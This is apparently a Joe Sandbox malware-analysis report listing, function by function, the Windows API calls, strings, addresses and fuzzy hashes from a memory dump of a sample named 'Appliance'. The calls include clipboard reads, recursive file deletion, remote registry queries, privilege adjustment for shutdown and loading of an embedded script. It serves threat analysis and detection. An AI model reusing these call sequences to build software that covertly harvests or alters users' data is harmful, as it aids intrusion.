                                                                                                                                            • Opcode ID: 15532dad74815cf8e5f5276001b0973330f4385b8ac7a6c0a2f18a78ebe3cf9d
                                                                                                                                            • Instruction ID: 9372bdb412b4f30cc913e953f0a81a46f244401394bc63f2c2a81de93d0857d7
                                                                                                                                            • Opcode Fuzzy Hash: 15532dad74815cf8e5f5276001b0973330f4385b8ac7a6c0a2f18a78ebe3cf9d
                                                                                                                                            • Instruction Fuzzy Hash: 80717AB2900219AFDF20DFA5EC48FAEBBB9FF14315F084595E915F6190D7319A09CBA0
                                                                                                                                            APIs
                                                                                                                                            • OpenClipboard.USER32(00E5DCD0), ref: 00E3F586
                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E3F594
                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00E3F5A0
                                                                                                                                            • CloseClipboard.USER32 ref: 00E3F5AC
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00E3F5E4
                                                                                                                                            • CloseClipboard.USER32 ref: 00E3F5EE
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00E3F619
                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00E3F626
                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 00E3F62E
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00E3F63F
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00E3F67F
                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E3F695
                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00E3F6A1
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00E3F6B2
                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E3F6D4
                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E3F6F1
                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E3F72F
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00E3F750
                                                                                                                                            • CountClipboardFormats.USER32 ref: 00E3F771
                                                                                                                                            • CloseClipboard.USER32 ref: 00E3F7B6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                            • Opcode ID: d3e9fd1c91788827171844b49c52ab76c2e05032cc6592993f181699ca4d5fe5
                                                                                                                                            • Instruction ID: aaa88d6583e72fdb96c22ec39e8ad9d6782ae52655964c10db4d112150de2262
                                                                                                                                            • Opcode Fuzzy Hash: d3e9fd1c91788827171844b49c52ab76c2e05032cc6592993f181699ca4d5fe5
                                                                                                                                            • Instruction Fuzzy Hash: 8F61C235504302AFD314EF20DC89F6A7BA4EF84709F04486DF446A72A2DB71DD4ACB62
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E37403
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E37457
                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E37493
                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E374BA
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E374F7
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E37524
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                            • Opcode ID: e7e3b90f4b576652e99c73446cf57bcbfc7b5758daf148c0fa0feae040a4ac0b
                                                                                                                                            • Instruction ID: 511f81341e08b559f37e4de16bb24ad8374fbad21a9c7bfe1c6c01983bc18923
                                                                                                                                            • Opcode Fuzzy Hash: e7e3b90f4b576652e99c73446cf57bcbfc7b5758daf148c0fa0feae040a4ac0b
                                                                                                                                            • Instruction Fuzzy Hash: 3FD151B2508345AEC314EB65C845EABB7ECEF88704F44091EF589D7252EB74DA44CB72
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E3A0A8
                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00E3A0E6
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00E3A100
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E3A118
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A123
                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3A13F
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3A18F
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00E87B94), ref: 00E3A1AD
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3A1B7
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A1C4
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A1D4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                            • Opcode ID: 475247b9ce7e028fb258114d636dd70e3fb131f84094a1d1fadbc746680f50b0
                                                                                                                                            • Instruction ID: 5a7dcdcae0c572e7c2b992438af839555b2794141617fc4d036a3bd7595aac13
                                                                                                                                            • Opcode Fuzzy Hash: 475247b9ce7e028fb258114d636dd70e3fb131f84094a1d1fadbc746680f50b0
                                                                                                                                            • Instruction Fuzzy Hash: E531027160531D6FDB24AFA1DC4DADE7BAD9F04365F141461E844F20A0EB70DE84CB21
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E34785
                                                                                                                                            • _wcslen.LIBCMT ref: 00E347B2
                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E347E2
                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E34803
                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00E34813
                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E3489A
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E348A5
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E348B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                            • Opcode ID: 515db80a31d363301098438623680bd8f1325a084cb6b5e785840a1847e63ce3
                                                                                                                                            • Instruction ID: 30cd1149b8f167e3976798308dd601c437df6a6a0b8fdcd8179fa4cddaaa4414
                                                                                                                                            • Opcode Fuzzy Hash: 515db80a31d363301098438623680bd8f1325a084cb6b5e785840a1847e63ce3
                                                                                                                                            • Instruction Fuzzy Hash: 4C31A1B5504249ABDB219BA1DC49FEB37BCEF89705F1045B6F509E60A0E7709684CB24
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E3A203
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E3A25E
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A269
                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E3A285
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E3A2D5
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00E87B94), ref: 00E3A2F3
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3A2FD
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A30A
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E3A31A
                                                                                                                                              • Part of subcall function 00E2E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E2E3B4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                            • Opcode ID: f3ea2b874759a571a9e3fab378eada6b8e9b68d0df99aeff6df0434317d57578
                                                                                                                                            • Instruction ID: bb18ac5b0ffd884ae6331ba009c370807948d77165b6427244200d5712f23fd1
                                                                                                                                            • Opcode Fuzzy Hash: f3ea2b874759a571a9e3fab378eada6b8e9b68d0df99aeff6df0434317d57578
                                                                                                                                            • Instruction Fuzzy Hash: B531F2315047196ECB24BFA5EC0DADE7BAD9F45328F1815A1E854B20A0EB35DEC9CA21
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C99E
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00E4CA09
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4CA2D
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E4CA8C
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E4CB47
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CBB4
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CC49
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4CC9A
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CD43
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4CDE2
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4CDEF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                            • Opcode ID: cd94b07955e71f23cd36b9eccf3bc4d3b5cc91c9c1ac37022e171cfee28127dc
                                                                                                                                            • Instruction ID: 1bb85527e121ad0753509878c75182892b73bb65cb855456502e1ff360817bbb
                                                                                                                                            • Opcode Fuzzy Hash: cd94b07955e71f23cd36b9eccf3bc4d3b5cc91c9c1ac37022e171cfee28127dc
                                                                                                                                            • Instruction Fuzzy Hash: 91026271605200AFC754DF24D895F2ABBE5EF88318F18849DF44ADB2A2DB31ED46CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871
                                                                                                                                              • Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E2D9CD
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E2DA88
                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00E2DA9B
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DAB8
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2DAE2
                                                                                                                                              • Part of subcall function 00E2DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E2DAC7,?,?), ref: 00E2DB5D
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00E2DAFE
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00E2DB0F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                            • String ID: \*.*
                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                            • Opcode ID: 34a2e1497defb9797f056dac22d8b95d71a6176134b0b20dcf1ace41be1edd73
                                                                                                                                            • Instruction ID: 138e4536da13a8cda8e8f710d70a44e04a1c8f294b2fc5ea05125b4bdd934e6e
                                                                                                                                            • Opcode Fuzzy Hash: 34a2e1497defb9797f056dac22d8b95d71a6176134b0b20dcf1ace41be1edd73
                                                                                                                                            • Instruction Fuzzy Hash: 5761487180911AAECF05EBA0ED52EEDB7B5AF14305F2041A9E50277191DB71AF4ACB60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                            • Opcode ID: a542012b09ffaa3370c6702a210fe5e937f0c663b502bc0ba1268f7d9aed0f6c
                                                                                                                                            • Instruction ID: ec7a6b9d2ea13bcc98f843a2fb09d67c5e83ec22835d8bb09481c3134c9cc43c
                                                                                                                                            • Opcode Fuzzy Hash: a542012b09ffaa3370c6702a210fe5e937f0c663b502bc0ba1268f7d9aed0f6c
                                                                                                                                            • Instruction Fuzzy Hash: A1419D34A04602AFD728DF16D88CF55BBE4EF44319F14C4A9E419AB662CB75EC46CBA0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E22010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
                                                                                                                                              • Part of subcall function 00E22010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
                                                                                                                                              • Part of subcall function 00E22010: GetLastError.KERNEL32 ref: 00E22097
                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00E2F249
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                            • Opcode ID: be44929650021050a317458614240889b3e2a66618e2e602048d9c90af32fa0d
                                                                                                                                            • Instruction ID: da83d0b723b7f3283dba9cbed53cdb30ef8244d2a82ef92ee81e48e6d9f16c0e
                                                                                                                                            • Opcode Fuzzy Hash: be44929650021050a317458614240889b3e2a66618e2e602048d9c90af32fa0d
                                                                                                                                            • Instruction Fuzzy Hash: 4F01A77B614234ABEB2862A87C85FBA727C9B05345F151931F902F21E1D5608D049160
                                                                                                                                            APIs
                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 00DC233E
                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00DC2421
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00DC2434
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$Proc
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 929743424-2063206799
                                                                                                                                            • Opcode ID: 175d4ec37fb7bdf1db9cd6b40f785b548da315e7a3eb5c0eca9343fdd9dd9f00
                                                                                                                                            • Instruction ID: 043d145edcc97d7f20555bf30af8419931331e812d1711eb90699b1e181acc25
                                                                                                                                            • Opcode Fuzzy Hash: 175d4ec37fb7bdf1db9cd6b40f785b548da315e7a3eb5c0eca9343fdd9dd9f00
                                                                                                                                            • Instruction Fuzzy Hash: 9A814BB0118491BEE63D663D8C98FBF199EDB42305F18050EF542F79D6C96ACF829236
                                                                                                                                            APIs
                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E056C2,?,?,00000000,00000000), ref: 00E33A1E
                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E056C2,?,?,00000000,00000000), ref: 00E33A35
                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE), ref: 00E33A45
                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE), ref: 00E33A56
                                                                                                                                            • LockResource.KERNEL32(00E056C2,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE,?), ref: 00E33A65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                            • String ID: SCRIPT
                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                            • Opcode ID: ca2dc38906fcaa272ecc16d3b1e60f219349c78a71effed715ed62aefe989543
                                                                                                                                            • Instruction ID: 1f2b6d41e880314a1432a871638e2d691c8cfae2b42a76b34a38193ec08184b7
                                                                                                                                            • Opcode Fuzzy Hash: ca2dc38906fcaa272ecc16d3b1e60f219349c78a71effed715ed62aefe989543
                                                                                                                                            • Instruction Fuzzy Hash: 73119771200301AFE7288B26DC48F277FB9EBC4B05F20466CB456EA6A0DB71E800CA20
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E21900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E21916
                                                                                                                                              • Part of subcall function 00E21900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E21922
                                                                                                                                              • Part of subcall function 00E21900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E21931
                                                                                                                                              • Part of subcall function 00E21900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E21938
                                                                                                                                              • Part of subcall function 00E21900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2194E
                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00E21C81), ref: 00E220FB
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E22107
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00E2210E
                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E22127
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00E21C81), ref: 00E2213B
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E22142
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
